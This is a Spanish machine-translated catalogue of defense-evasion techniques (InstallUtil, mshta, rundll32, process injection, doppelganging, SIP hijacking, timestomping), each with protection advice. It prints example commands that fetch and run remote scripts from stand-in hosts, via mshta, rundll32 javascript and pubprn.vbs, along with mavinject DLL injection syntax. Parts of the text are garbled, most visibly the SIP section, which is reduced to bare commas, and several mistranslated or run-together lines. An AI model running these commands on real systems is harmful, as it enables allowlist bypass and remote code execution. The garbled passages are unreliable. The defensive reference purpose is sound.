HKEY_LOCAL_MACHINE \ SOFTWARE \ Policies \ Microsoft \ SystemCertificates \ Root \ ProtectedRoots \ Flags = 1.Es poco probable que los certificados raíz del sistema cambien con frecuencia, por lo tanto, durante el monitoreo de los nuevos certificados, uno puede detectar actividad maliciosa o asegurarse de que no haya certificados innecesarios o sospechosos. Microsoft proporciona una lista de certificados raíz de confianza a través de authroot.stl. La utilidad Sysinternals Sigcheck se puede usar para volcar el contenido del almacén de certificados (Sigcheck [64] .exe -tuv) e identificar certificados no incluidos en la Lista de confianza de certificados de Microsoft.
Los certificados raíz instalados se encuentran en el registro en las siguientes secciones:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ EnterpriseCertificates \ Root \ Certificates
HKEY_LOCAL_MACHINE [HKEY_CURRENT_USER] \ SOFTWARE [\ Policies] \ Microsoft \ SystemCertificates \ Root \ CertificatesHay un subconjunto de certificados raíz que se usan constantemente en sistemas Windows que se pueden usar para monitorear:
• 18F7C1FCC3090203FD5BAA2F861A754976C8DD25;
• 245C97DF7514E7CF2DF8BE72AE957B9E04741E85;
• 3B1EFD3A66EA28B16697394703A72CA340A05BD5;
• 7F88CD7223F3C813818C994614A89C99FA3B5247;
• 8F43288AD272F3103B6FB1428485EA3014C0BCFE;
• A43489159A520F0D93D032CCAF37E7FE20A8B419;
• BE36A4562FB2EE05DBB3D32323ADF445084ED656;
• CDD4EEAE6000AC7F40C3802C171E30148030C072.
Sistema: Windows
Derechos: usuario
Descripción: InstallUtil es una utilidad de línea de comandos de Windows que puede instalar y desinstalar aplicaciones que cumplen con las especificaciones de .NET Framework. Installutil se instala automáticamente con VisualStudio. El archivo InstallUtil.exe está firmado por un certificado de Microsoft y se almacena en:
C: \ Windows \ Microsoft.NET \ Framework \ v [versión] \ InstallUtil.exeLos atacantes pueden usar la funcionalidad InstallUtil para ejecutar el código proxy y omitir las listas blancas de aplicaciones.
Recomendaciones de protección: es posible que InstallUtil no se use en su sistema, por lo tanto, considere bloquear la instalación de InstallUtil.exe.
Sistema: macOS
Derechos: Usuario, Administrador
Descripción: a partir de OS X 10.8, el encabezado LC_MAIN se incluye en los ejecutables mach-O, lo que indica el punto de entrada del código binario para ejecutarlo. En versiones anteriores, se usaban dos encabezados LC_THREAD y LC_UNIXTHREAD. El punto de entrada para el binario puede modificarse y la adición maliciosa se realizará inicialmente, y luego la ejecución volverá al punto de partida para que la víctima no note nada. Dicha modificación de los archivos binarios es una forma de omitir la lista blanca de aplicaciones, ya que el nombre del archivo y la ruta a la aplicación permanecerán sin cambios.
Recomendaciones de protección: use aplicaciones que solo tengan firmas digitales válidas de desarrolladores confiables. La modificación del encabezado LC_MAIN invalidará la firma del archivo y cambiará la suma de verificación del archivo.
Sistema: macOS
Derechos: Usuario, Administrador
Descripción: Launchctl: una utilidad para administrar el servicio Launchd. Con Launchctl, puede administrar los servicios del sistema y del usuario (LaunchDeamons y LaunchAgents), así como ejecutar comandos y programas. Launchctl admite subcomandos de línea de comandos, interactivos o redirigidos desde la entrada estándar:
launchctl submit -l [nombre de etiqueta] - / Ruta / a / cosa / a / ejecutar '' arg "'' arg" '' arg " .
Al iniciar y reiniciar servicios y demonios, los atacantes pueden ejecutar código e incluso omitir la lista blanca si launchctl es un proceso autorizado, sin embargo, cargar, descargar y reiniciar servicios y demonios puede requerir privilegios elevados.
Recomendaciones de seguridad: limitar los derechos de los usuarios para crear Agentes de lanzamiento y lanzar Deamons de lanzamiento mediante la Política de grupo. Con la aplicación
KnockKnock , puede descubrir programas que usan launchctl para administrar Agentes de lanzamiento y Deamons de lanzamiento.
Sistema: Windows, Linux, macOS
Descripción: El enmascaramiento ocurre cuando el nombre o la ubicación de un archivo ejecutable, legal o malicioso, está sujeto a varias manipulaciones y abusos para eludir la protección. Se conocen varias opciones de enmascaramiento.
Una opción es que el ejecutable se coloque en un directorio generalmente aceptado o se le dé el nombre de un programa legítimo y confiable. El nombre del archivo puede ser similar al nombre de un programa legítimo. Este método de enmascaramiento se utiliza para omitir herramientas que confían en los archivos según el nombre o la ruta del archivo, así como para engañar a los administradores del sistema.
VentanasOtra forma de maximizar es que un atacante use una copia modificada de una utilidad legítima, como rundll32.exe. En este caso, una utilidad legítima se puede mover a otro directorio y cambiar su nombre para evitar la detección basada en el monitoreo del lanzamiento de las utilidades del sistema desde ubicaciones no estándar.
Un ejemplo de abuso de directorios de confianza en Windows es el directorio C: \ Windows \ System32. Los nombres de las utilidades confiables del sistema como explorer.exe o svchost.exe pueden asignarse a archivos binarios maliciosos.
LinuxEl siguiente método de enmascaramiento es utilizar archivos binarios maliciosos que, después de comenzar, cambian el nombre de su proceso al nombre de un proceso legítimo y confiable. Un ejemplo de un directorio confiable en Linux es el directorio / bin, y nombres como rsyncd o dbus-inotifier pueden ser nombres confiables.
Recomendaciones de seguridad
: al crear varias reglas de seguridad, evite excepciones basadas en el nombre y la ruta del archivo. Requiere firmar archivos binarios. Use controles de acceso al sistema de archivos para proteger directorios confiables, como C: \ Windows \ System32. No utilice herramientas para restringir la ejecución de programas en función del nombre o la ruta del archivo.
Identifique y bloquee software potencialmente peligroso y malicioso que pueda parecer un programa legítimo.
Sistema: Windows
Derechos: usuario, administrador, sistema
Descripción: los atacantes pueden modificar el registro para ocultar información en las claves del registro o para eliminar información durante la limpieza de los rastros de una invasión o en otras etapas del ataque.
El acceso a ciertas áreas del registro depende de los permisos de la cuenta. La utilidad Reg incorporada se puede utilizar tanto para la modificación del registro local como remota. Se pueden usar otras herramientas de acceso remoto que interactúan con el registro a través de la API de Windows.
Los cambios en el registro pueden incluir acciones para ocultar las claves, por ejemplo, agregando claves con un nombre de un carácter nulo. Leer dicha clave a través de Reg o API dará como resultado un error o será ignorado. Los atacantes pueden usar esas pseudoclaves ocultas para ocultar la carga útil y los comandos utilizados en el proceso de consolidación en el sistema.
El registro del sistema remoto también se puede cambiar si el servicio de registro remoto está activo en el sistema de destino. Por lo general, un atacante también necesita credenciales válidas, así como acceso a recursos compartidos de administrador de Windows para usar RPC.
Recomendaciones de protección: la configuración incorrecta de permisos en el registro puede llevar al hecho de que un atacante podría ejecutar código arbitrario (
Debilidad de permisos de registro de servicio ). Asegúrese de que los usuarios no puedan cambiar las claves de componentes del sistema. Bloquee las utilidades innecesarias del sistema y otro software que pueda usarse para modificar el registro. Considere habilitar la auditoría de registro (Evento ID4657), pero tenga en cuenta que los cambios de registro realizados con herramientas como RegHide no serán registrados por el servicio de recopilación de eventos del sistema operativo.
Sistema: Windows
Derechos: usuario
Descripción: Mshta.exe (ubicado en
C: \ Windows \ System32 \ ) es una utilidad que ejecuta aplicaciones HTML de Microsoft (* .HTA). Las aplicaciones HTA se ejecutan usando las mismas tecnologías que usa InternetExplorer, pero fuera del navegador. Debido al hecho de que Mshta procesa archivos sin pasar por la configuración de seguridad del navegador, los atacantes pueden usar mshta.exe para representar la ejecución de archivos HTA maliciosos, Javascript o VBScript. El archivo malicioso se puede iniciar mediante el script incorporado:
mshta vbscript: Close (Execute ("GetObject (" "script: https [:] // webserver / payload [.] sct" ")")))o directamente, en la URL:
mshta http [:] // servidor web / carga útil [.] htaRecomendaciones de protección: la funcionalidad de mshta.exe está asociada con versiones anteriores de IE que han llegado al final de su ciclo de vida. Bloquee Mshta.exe si no está utilizando su funcionalidad.
Sistema: Windows
Descripción: La sección NTFS contiene la Tabla maestra de archivos (MFT), que almacena datos sobre el contenido del volumen, las filas corresponden a los archivos y las columnas a sus atributos, incluidos atributos como los atributos extendidos (EA), una cadena de 64 kb) y Secuencias alternativas (Secuencias de datos alternativas (ADS) - metadatos de tamaño arbitrario) que se pueden usar para almacenar cualquier información. Los atacantes pueden almacenar datos maliciosos y archivos binarios en atributos extendidos y metadatos de archivos. Esta técnica le permite omitir algunas herramientas de protección, como las herramientas de escaneo basadas en indicadores estáticos y algunas herramientas antivirus.
Recomendaciones de protección: bloquear el acceso a EA y ADS puede ser bastante complejo e inapropiado y, además, puede conducir a un funcionamiento inestable de la funcionalidad estándar del sistema operativo. Dirija el vector de protección para evitar que se inicie el software, con el que puede ocultar información en EA y ADS.
Sistema: Windows
Derechos: administrador, usuario
Descripción: las conexiones a carpetas de red y Windows Admin Share se pueden eliminar si ya no son necesarias. Net es un ejemplo de una utilidad que se puede usar para eliminar conexiones de red:
net use \ system \ share / delete . Los opositores pueden eliminar las conexiones de red que no necesitan para borrar los rastros de intrusión.
Consejos de seguridad: siga las mejores prácticas para organizar recursos compartidos de administración de Windows. Identifique las utilidades del sistema y el software innecesarios que se pueden usar para conectarse a recursos compartidos de red y considere auditar su uso o bloqueo.
Sistema: Windows, Linux, macOS
Descripción: los atacantes pueden usar cifrado, cifrado y todo tipo de métodos para ofuscar archivos y sus contenidos en el sistema o durante su transferencia.
Las cargas útiles se pueden archivar o cifrar, a veces para su desofuscación y posterior lanzamiento, se requiere alguna acción del usuario, por ejemplo, ingresar una contraseña para abrir un archivo preparado por un atacante.
Para ocultar líneas de texto plano, también se pueden codificar partes de archivos. Las cargas útiles se pueden dividir en archivos "benignos" separados que, cuando se ensamblan como un todo, realizan funciones maliciosas.
Los opositores también pueden ofuscar comandos llamados desde cargas útiles directamente o mediante la interfaz de línea de comandos. Las variables de entorno, los alias y los caracteres específicos de la plataforma o la semántica del lenguaje se pueden usar para evitar la detección de malware basada en firmas y listas blancas.
Otro ejemplo de ofuscación es el uso de esteganografía, la técnica de ocultar datos o códigos en imágenes, pistas de audio, videos y archivos de texto.
Recomendaciones de protección: utilice herramientas de análisis y detección de malware que verifican no solo el código fuente en sí, sino que también analizan el proceso de ejecución de comandos. En Windows 10, esta funcionalidad se presenta como la Interfaz de escaneo antimalware (AMSI).
La presencia de caracteres de escape en comandos, como ^ o ", puede servir como un indicador de ofuscación. Utilizando Windows Sysmon y el evento Event ID 4688, puede ver los argumentos de los comandos ejecutados en varios procesos.
La ofuscación utilizada en las cargas útiles durante la fase de acceso inicial se puede detectar en la red utilizando el sistema IDS y las puertas de enlace de seguridad de correo electrónico que identifican datos y scripts comprimidos y cifrados en los archivos adjuntos. La identificación de las cargas útiles transmitidas a través de una conexión cifrada desde un sitio web se puede hacer inspeccionando el tráfico cifrado.
Sistema: macOS
Derechos: Usuario, Administrador
Descripción: los atacantes pueden modificar archivos plist especificando en ellos su propio código para su ejecución en el contexto de otro usuario. Los archivos de propiedades de plist ubicados en / Library / Preferences se ejecutan con privilegios elevados, y los archivos de plist de ~ / Library / Preferences se ejecutan con privilegios de usuario.
Consejos de seguridad
: evite que los archivos plist se modifiquen haciéndolos de solo lectura.
Sistema: Linux, macOS
Derechos: usuario
Descripción: los atacantes pueden usar los métodos de detección de puertos para ocultar los puertos abiertos que usan para conectarse al sistema.
Consejos de
seguridad: el uso de firewalls con estado puede evitar que se implementen algunas opciones de Knock Port.
Sistema: Windows
Derechos: usuario, administrador, sistema
Descripción: NTFS transaccional (TxF) es una tecnología introducida por primera vez en Vista que permite operaciones de archivo mediante transacciones. En TxF, solo un descriptor de transacción puede escribir el archivo en este momento, todos los demás descriptores estarán aislados y solo podrán leer la versión del archivo que estaba bloqueado en el momento de la apertura. Si el sistema o la aplicación se bloquea, TxF revertirá automáticamente los cambios en el archivo. TxF todavía está incluido en Windows 10.
La técnica Doppelganging Process (del alemán "transmisión de dos etapas", "doble carrera") implica el uso de funciones WinAPI no documentadas y se implementa en 4 pasos:
- Transacción Se crea una transacción NTFS utilizando el ejecutable atacado, y se crea una versión modificada temporal del ejecutable como parte de la transacción.
- Descargar Se crea una sección compartida en la memoria en la que se carga una versión modificada del archivo ejecutable.
- Rollback La transacción NTFS se revierte, como resultado de lo cual el archivo atacado original se guarda en el disco en su forma original.
- Animación Usando una versión modificada del archivo ejecutable que permanece en la RAM, se crea un proceso y se inicia su ejecución.
Por lo tanto, el código malicioso funcionará en el contexto de un proceso legítimo de confianza. Dado que el ataque ocurre solo en la memoria, porque No se completa una transacción NTFS, pero se revierte, no quedará ningún rastro de actividad maliciosa en el disco.
Consejos de seguridad: es probable que las medidas de seguridad preventivas en forma de intentos de bloquear ciertas llamadas API tengan efectos secundarios negativos. El vector de protección debe estar dirigido a prevenir el lanzamiento de herramientas maliciosas en las primeras etapas de la cadena de ataque. La duplicación se puede utilizar para omitir las características de seguridad, sin embargo, sigue siendo una buena práctica bloquear aplicaciones potencialmente peligrosas y restringir el uso de software mediante listas blancas. La detección de ataques se realiza mediante el análisis de llamadas a las funciones API CreateTransaction, CreateFileTransacted, RollbackTransaction, funciones no documentadas como NTCreateProcessEX, NtCreateThreadEX y llamadas API utilizadas para cambiar la memoria en otro proceso, como WriteProcessMemory.
Sistema: Windows
Derechos: usuario
Descripción: El ataque se lleva a cabo sustituyendo la imagen del archivo ejecutable del proceso durante la suspensión del proceso. Se encuentra entre las diez técnicas básicas para los procesos de inyección .Consejos de seguridad: es probable que las medidas de seguridad preventivas en forma de intentos de bloquear ciertas llamadas API tengan efectos secundarios negativos. El vector de protección debe estar dirigido a prevenir el lanzamiento de herramientas maliciosas en las primeras etapas de la cadena de ataque. Process Hollowing se puede utilizar para eludir las características de seguridad, sin embargo, sigue siendo una buena práctica bloquear aplicaciones potencialmente peligrosas y limitar el uso de software mediante listas blancas.Sistema: Windows, Linux, macOSDerechos: usuario, administrador, sistema, raízDescripción: La inyección de proceso es un método de ejecución de código arbitrario en el espacio de direcciones de un proceso vivo separado. Ejecutar código en el contexto de otro proceso le permite acceder a la memoria del proceso inyectado, los recursos del sistema / red y posiblemente privilegios elevados. Las inyecciones de proceso también se pueden utilizar para evitar la posible detección de actividad maliciosa por medios de seguridad. Las técnicas para implementar inyecciones en los procesos se basan en el abuso de varios mecanismos que aseguran el subprocesamiento múltiple de la ejecución del programa en el sistema operativo. Los siguientes son algunos enfoques para inyectar código en un proceso.Ventanas• Inyecciones de DLL. Se realizan escribiendo la ruta a la DLL maliciosa dentro del proceso y luego ejecutándola creando un subproceso remoto (Subproceso remoto: un subproceso que se ejecuta en el espacio de direcciones virtuales de otro proceso). En otras palabras, el malware escribe la DLL en el disco y luego usa una función como CreateRemoteTread, que llamará a la función LoadLibrary en el proceso inyectado.• Las inyecciones de PE (inyección ejecutable portátil) se basan en el abuso de las funciones de ejecución de memoria de los archivos de PE, como DLL o EXE. El código malicioso se escribe en el proceso sin escribir ningún archivo en el disco, y luego se ejecuta la ejecución utilizando el código adicional o creando una secuencia remota.• El secuestro de ejecución de subprocesos implica la inyección de código malicioso o rutas DLL directamente en el subproceso del proceso. Al igual que la técnica de proceso de vaciado, el flujo primero debe suspenderse.• La inyección en una inyección de llamada a procedimiento asincrónico (APC) implica la incrustación de código malicioso en la cola APC de un subproceso de proceso. Uno de los métodos de inyección APC, llamado "inyección Earle Bird", implica la creación de un proceso suspendido en el que se puede escribir y lanzar código malicioso en el punto de entrada del proceso a través de APC. AtomBombing es otra opción de inyección que usa APC para invocar código malicioso previamente escrito en la tabla global de átomos.• Las inyecciones de inyección Thread Local Storage (TLS) implican manipular punteros de memoria dentro de un archivo PE ejecutable para redirigir el proceso a código malicioso.Mac y Linux• Las variables de sistema LD_RPELOAD, LD_LIBRARY_PATH (Linux), DYLIB_INSERT_LIBRARIES (macOS X) o la interfaz de programación de aplicaciones (API) dlfcn se pueden usar para cargar dinámicamente una biblioteca (objeto compartido) en un proceso, que a su vez se puede usar para interceptar llamadas API desde Procesos en ejecución.• La llamada al sistema Ptrace se puede utilizar para conectarse a un proceso en ejecución y cambiarlo mientras se está ejecutando.• / proc / [pid] / mem proporciona acceso a la memoria del proceso y puede usarse para leer / escribir datos arbitrarios, sin embargo, este método rara vez se usa debido a la complejidad de su implementación.• La captura de VDSO (objeto compartido dinámico dinámico) le permite inyectar código mientras ejecuta binarios ELF manipulando los apéndices de código de linux-vdso.so.Los programas maliciosos generalmente usan la inyección de código en un proceso para acceder a los recursos del sistema, lo que permite a un atacante obtener un punto de apoyo en el sistema y realizar otros cambios en el entorno atacado. Las muestras más complejas pueden realizar inyecciones de procesos múltiples para dificultar su detección.Recomendaciones de protección:Los métodos para inyectar código en los procesos se basan en el abuso de las funciones normales del sistema operativo, un impacto directo sobre el cual puede conducir a la operación inestable de software legítimo y productos de seguridad. Los esfuerzos para evitar el uso de técnicas de intercepción deben centrarse en las etapas más tempranas de la cadena de ataque. Use herramientas para bloquear software potencialmente peligroso, como AppLocker. Use Yama como medida preventiva contra la inyección de código en ptrace, limitando el uso de ptrace solo a usuarios privilegiados. Las medidas de seguridad adicionales pueden incluir el despliegue de módulos de seguridad del núcleo que proporcionan control de acceso avanzado y restricción de procesos. Dichas herramientas incluyen SELinux, grsecurity, AppArmor.Sistema: Windows, Linux,derechos de macOS : Usuario, Administrador, Descripción del sistema:Los atacantes pueden usar simultáneamente varias herramientas de acceso remoto con diferentes protocolos de control para diversificar los riesgos de detección. Por lo tanto, si se detecta y bloquea una de las herramientas de acceso remoto, pero la parte defensora no ha identificado todas las herramientas del atacante, el acceso remoto a la red atacada se conservará. Los atacantes también pueden intentar obtener acceso a cuentas válidas de servicios corporativos remotos, como las VPN, para obtener acceso alternativo al sistema en caso de bloquear las herramientas básicas de acceso remoto. El uso de un shell web también es una de las formas de acceder de forma remota a una red a través de un servidor web.Recomendaciones de protección:Monitoree la presencia y el bloqueo del lanzamiento de herramientas de acceso remoto conocidas en su red (AmmyAdmin, Radmin, RemotePC, VNC, etc.), use herramientas para controlar el inicio de aplicaciones y bloquear software potencialmente peligroso. La introducción de sistemas IDS e IPS que detectan malware específico mediante firmas reducirá la probabilidad de un ataque exitoso, pero con el tiempo, los atacantes modificarán sus herramientas para cambiar la firma y, como resultado, evitarán los sistemas IDS e IPS.Sistema: Derechos de Windows : Usuario, AdministradorDescripción: Regsvcs y Regasm son utilidades de utilidades de Windows que se utilizan para registrarse con el sistema de ensamblaje de .NET Component Object Model (COM). Ambos archivos están firmados digitalmente por Microsoft. Los atacantes pueden usar Regsvcs y Regasm para ejecutar el código proxy cuando el atributo es el código que debe ejecutarse antes de registrar o anular el registro: [ComRegisterFunction] o [ComUnregisterFunction]. El código con tales atributos se puede iniciar incluso si el proceso se ejecuta con privilegios insuficientes o incluso se bloquea al inicio.Recomendaciones de protección: Bloquee Regsvcs.exe y Regasm.exe si no se utilizan en su sistema o red.Sistema: Windows, Linux, macOSDerechos: Administrador, Sistema, raízDescripción: Los rootkits son programas que ocultan la presencia de malware al interceptar y modificar las llamadas a la API. Los rootkits pueden funcionar a nivel de usuario, kernel del sistema operativo o, incluso, a nivel de hipervisor, MBR o firmware del sistema. Los opositores usan rootkits para ocultar la presencia de programas, archivos, conexiones de red, controladores y otros componentes del sistema operativo.Recomendaciones de protección: identifique y bloquee software potencialmente peligroso que pueda contener rootkits utilizando herramientas de lista blanca de software, herramientas antivirus o herramientas de protección del sistema operativo integradas.Sistema: Derechos de Windows :Descripción del usuario : Rundll32.exe es una utilidad del sistema para iniciar programas ubicados en bibliotecas conectadas dinámicamente; se puede llamar a un archivo binario proxy, ejecutar archivos de control de Windows (.cpl) a través de funciones de shel32.dll no documentadas - Control_RunDLL y Control_RunDLLAsUser . Al hacer doble clic en el archivo .cpl también se ejecuta Rundll32.exe. Rundll32 también se puede usar para ejecutar scripts como JavaScript:rundll32.exe javascript: "\ .. \ mshtml, RunHTMLApplication"; document.write (); GetObject ("scrirpt: https [:] // www [.] Ejemplo [ .] com / malware.sct ")"El método anterior de usar rundll32.exe es detectado por un software antivirus como un virus como Poweliks.Recomendaciones de protección: Attack Surface Reduction (ASR) en EMET y Advanced Theart Protection en Windows Defender pueden bloquear el uso de Rundll32.exe para omitir las listas blancas.Sistema: Derechos de Windows : Administrador,Descripción del sistema : los atacantes pueden modificar los componentes de la arquitectura para firmar y verificar la firma digital del código de Windows para evitar los medios de controlar el lanzamiento de programas que permiten ejecutar solo el código firmado. Para crear, firmar y verificar la firma de archivos de varios formatos en Windows, se utiliza el denominado Paquete de interfaz de sujeto (SIP) , especificaciones de software que son únicas para cada tipo de archivo, que permiten la interacción entre las funciones API que inician la creación, el cálculo y la verificación de firmas y directamente archivos. La validez de la firma se confirma con el denominado proveedor de confianza.- Estos son componentes de software del sistema operativo que llevan a cabo diversos procedimientos relacionados con el cálculo y la verificación de firmas digitales.Métodos de ataque populares:- Modificación de las claves DLL y FuncName en la sección CryptSIPDllGetSignedDataMsg :
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Cryptography \ OID \ EncodingType 0 \ CryptSIPDllGetSignedDataMsg \ [SIP_GUID] .
Se realiza con el objetivo de reemplazar la biblioteca DLL que proporciona la función CryptSIPDllGetSignedDataMSG , . (, Microsoft ) SIP. , , , , , , , . - DLL FuncName :
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData/[SIP_GUID] .
DLL-, CryptSIPDllVerifyIndirectData , , , , , (True/False). , c SIP. , DLL-. - DLL FuncName :
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy/[Trust Provider GUID] .
DLL-, FinalPolicy Trust Provider, , . CryptSIPDllVerifyIndirectData, DLL-.
Es importante tener en cuenta que el ataque descrito en el mecanismo de confianza de Windows se puede implementar utilizando la técnica de secuestro de órdenes de búsqueda de DLL.Recomendaciones de protección: asegúrese de que los usuarios del sistema protegido no puedan modificar las claves de registro relacionadas con los componentes SIP y Trust Provider. Considere eliminar SIP innecesarios y obsoletos. Use todo tipo de medios para bloquear la descarga de archivos DLL maliciosos, por ejemplo, aquellos integrados en Windows AppLocker y DeviceGuard.Sistema: Windows, Linux, macOSDerechos: Descripción del usuario : los atacantes pueden usar secuencias de comandos para automatizar sus acciones, acelerar las tareas operativas y, como resultado, reducir el tiempo necesario para obtener acceso. Algunos lenguajes de secuencias de comandos se pueden utilizar para omitir los mecanismos de monitoreo de procesos al interactuar directamente con el sistema operativo a nivel de API en lugar de llamar a otros programas. Los scripts se pueden incrustar en documentos de Office como macros y luego usarse para ataques de phishing. En este caso, los atacantes esperan que el usuario ejecute el archivo macro o que el usuario acepte activar la macro. Existen varios marcos populares para implementar secuencias de comandos: Metasploit, Veil, PowerSploit.Consejos de seguridad: limite el acceso a scripts como VBScript o PowerShell. En Windows, configure los ajustes de seguridad de MS Office habilitando la visualización segura y la prohibición de macros a través de GPO. Si se necesitan macros, solo permita que se ejecuten macros confiables firmadas digitalmente. Utilice la microsegmentación y la virtualización de aplicaciones, por ejemplo, Sandboxie para Windows y Apparmor, Docker para Linux.Sistema: Derechos de Windows :Descripción del usuario : Los archivos binarios firmados con certificados digitales confiables se pueden ejecutar en sistemas Windows que están protegidos por verificación de firma digital. Varios archivos de Microsoft firmados de manera predeterminada durante la instalación de Windows se pueden usar para representar el inicio de otros archivos:• Mavinject.exe es una utilidad de Windows que permite ejecutar código. Mavinject se puede utilizar para ingresar la DLL en el proceso de ejecución:"C: \ Archivos de programa \ Archivos comunes \ microsoft shared \ ClickToRun \ MavInject32.exe" [PID] / INJECTRUNNING [PATH DLL];C: \ Windows \ system32 \ mavinject.exe [PID] / INJECTRUNNING [PATH DLL];• SyncAppvPublishingServer.exe: se puede usar para ejecutar scripts de PowerShell sin ejecutar Powershell.exe.Hay varios binarios más similares .Recomendaciones de protección: es posible que no se utilicen muchos archivos firmados en su sistema, por lo tanto, considere bloquear su inicio.Sistema: Derechos de Windows :Descripción de los usuarios : las secuencias de comandos firmadas con certificados de confianza se pueden usar para representar archivos maliciosos, por ejemplo, PubPrn.vbs se firma con un certificado de Microsoft y se puede usar para ejecutar un archivo desde un servidor remoto:cscript C: \ Windows \ System32 \ Printing_Admin_Scripts \ script ru-RU \ pubprn.vbs 127.0.0.1: http [:] // 192.168.1.100/hi.pngRecomendaciones de protección: Es posible que dichos scripts firmados no sean necesarios en su sistema, por lo tanto, considere bloquear su inicio.Sistema: WindowsDescripción:El paquete de software implica el uso por parte del adversario de métodos de compresión o encriptación para archivos ejecutables, lo que resulta en un cambio en la suma de verificación del archivo, lo que evita la detección basada en la búsqueda de firmas estáticas. La mayoría de los métodos de descompresión descomprimen el código ejecutable en la memoria. Ejemplos de utilidades populares: los empaquetadores de archivos ejecutables son MPRESS y UPS, sin embargo, se conocen muchos otros empacadores, además, los oponentes pueden crear sus propios métodos de empaque que no dejarán tales artefactos como empacadores conocidos. Empaquetar archivos ejecutables no es un indicador claro de malware, ya que los desarrolladores de software legítimos pueden usar métodos de empaque para reducir el tamaño del paquete de distribución o proteger el código propietario.Recomendaciones de protección:Actualice las herramientas de protección antivirus, cree firmas personalizadas para la detección de malware y use métodos de detección heurísticos. Identificar y bloquear software potencialmente peligroso.Sistema: Linux, macOSDerechos: Descripción del usuario:Los atacantes pueden ocultar el verdadero tipo de un archivo cambiando su extensión. Para ciertos tipos de archivos (no funciona con archivos .app), agregar un carácter de espacio al final del nombre del archivo cambiará la forma en que el sistema operativo procesa el archivo. Por ejemplo, si hay un archivo ejecutable Mach-O con el nombre evil.bin, cuando el usuario hace doble clic, el sistema operativo iniciará Terminal.app y lo ejecutará. Si se cambia el nombre del mismo archivo a evil.txt, con un doble clic comenzará en un editor de texto. Sin embargo, si se cambia el nombre del archivo a "evil.txt" (espacio al final), al hacer doble clic en el tipo del archivo verdadero, se determinará el sistema operativo y se iniciará el archivo binario. Los atacantes pueden usar esta técnica para engañar a un usuario para que inicie un archivo ejecutable malicioso.Recomendaciones de protección:El uso de esta técnica es difícil de prevenir porque un atacante utiliza mecanismos operativos estándar del sistema operativo, por lo tanto, el vector de protección debe estar dirigido a prevenir acciones maliciosas en las primeras etapas del ataque, por ejemplo, en la etapa de entrega o creación de un archivo malicioso en el sistema.Sistema: Windows,Derechos de Linux : Usuario, Administrador,Descripción del sistema : Timestomp es un cambio en las marcas de tiempo del archivo (cambio, acceso, creación). A menudo, los métodos de marca de tiempo se utilizan para enmascarar archivos que han sido modificados o creados por un atacante para que los expertos forenses y las herramientas forenses no los noten. La marca de tiempo se puede usar junto con el enmascaramiento de nombres de archivos para ocultar el malware y las herramientas de intrusos.Recomendaciones de protección:Dirija el vector de protección para evitar el lanzamiento de software potencialmente peligroso y malicioso. El análisis forense describe métodos para organizar herramientas para detectar la modificación de marcas de tiempo mediante la recopilación de información sobre cómo abrir un descriptor de archivo y compararlo con las marcas de tiempo especificadas en el archivo.Sistema: Derechos de Windows :Descripción del usuario : Hay muchas utilidades que usan los desarrolladores de software y que se pueden usar para ejecutar código en varias formas durante el desarrollo del software, la depuración y la ingeniería inversa. Estas utilidades a menudo se firman con certificados digitales que les permiten proxy de código malicioso en el sistema operativo, evitando los mecanismos de seguridad y las hojas blancas de las aplicaciones.• MSBulid es una plataforma de desarrollo de software utilizada en Visual Studio. Utiliza proyectos en forma de archivos XML que describen los requisitos para construir varias plataformas y configuraciones. MSBuild de .NET versión 4 le permite insertar código C # en un proyecto XML, compilarlo y luego ejecutarlo. MSBulid.exe está firmado por Microsoft Digital Certificate.• DNX: .Net Execution Environmant (dnx.exe) es un kit de desarrollo para Visual Studio Enterprise. Descontinuado desde .NET Core CLI en 2016. Falta DNX en las compilaciones estándar de Windows y solo puede estar presente en los hosts de desarrollador cuando se utiliza .Net Core y ASP.NET Core 1.0. Dnx.exe está firmado digitalmente y se puede usar para ejecutar código proxy.• RCSI es una interfaz de línea de comandos no interactiva para C #, similar a csi.exe. Fue introducido en una versión anterior de la plataforma compiladora Roslyn .Net. Rcsi.exe está firmado por Microsoft Digital Certificate. Los archivos de script C # .csx se pueden escribir y ejecutar usando Rcsi.exe en el símbolo del sistema de Windows.• WinDbg / CDB es el kernel de MS Windows y una utilidad para depurar en modo de usuario. El depurador de consola de Microsoft cdb.exe también es un depurador en modo de usuario. Ambas utilidades se pueden usar como herramientas independientes. Comúnmente utilizado en el desarrollo de software, ingeniería inversa, y no se puede encontrar en los sistemas normales de Windows. Los archivos WinDbg.exe y CDB.exe están firmados por Microsoft Digital Certificate y pueden utilizarse para codificar el proxy.• Rastreador: utilidad de seguimiento de archivos tracker.exe. Incluido en .NET como parte de MSBuild. Se usa para registrar llamadas en el sistema de archivos de Windows 10. Los atacantes pueden usar tracker.exe para ejecutar DLL en varios procesos. Tracker.exe también está firmado con un certificado de Microsoft.Recomendaciones de protección: Todos los archivos anteriores están sujetos a la eliminación del sistema, si los usuarios no los utilizan para el fin previsto.Descripción: los atacantes pueden robar las credenciales de una cuenta de usuario o servicio específica utilizando las técnicas de acceso de credenciales, capturar las credenciales durante el proceso de inteligencia utilizando la ingeniería social. Las credenciales comprometidas se pueden usar para omitir los sistemas de control de acceso y obtener acceso a sistemas remotos y servicios externos, como VPN, OWA, Escritorio remoto, o para obtener privilegios elevados en sistemas y áreas específicos de la red. Si el escenario es exitoso, los atacantes pueden rechazar el malware para que sea difícil de detectar. Además, los atacantes pueden crear cuentas usando nombres y contraseñas predefinidos para mantener el acceso de respaldo en caso de intentos fallidos de usar otros medios.
Recomendaciones de protección: aplique una política de contraseña, siga las recomendaciones para diseñar y administrar una red corporativa para limitar el uso de cuentas privilegiadas en todos los niveles administrativos. Controles regulares de las cuentas de dominio y locales y sus derechos para identificar aquellos que podrían permitir a un atacante obtener un amplio acceso. Monitoreo de la actividad de la cuenta utilizando sistemas SIEM.
Sistema: Windows
Derechos: usuario
Descripción: los atacantes pueden usar un servicio web externo legítimo en ejecución como medio para enviar comandos para controlar un sistema infectado. Los servidores de administración se denominan Comando y control (C&C o C2). Los sitios web populares y las redes sociales pueden actuar como un mecanismo para C2, y también se pueden usar varios servicios públicos como Google o Twitter. Todo esto ayuda a ocultar la actividad maliciosa en el flujo de tráfico general. Los servicios web generalmente usan SSL / TLS, por lo que los adversarios obtienen una capa adicional de protección.
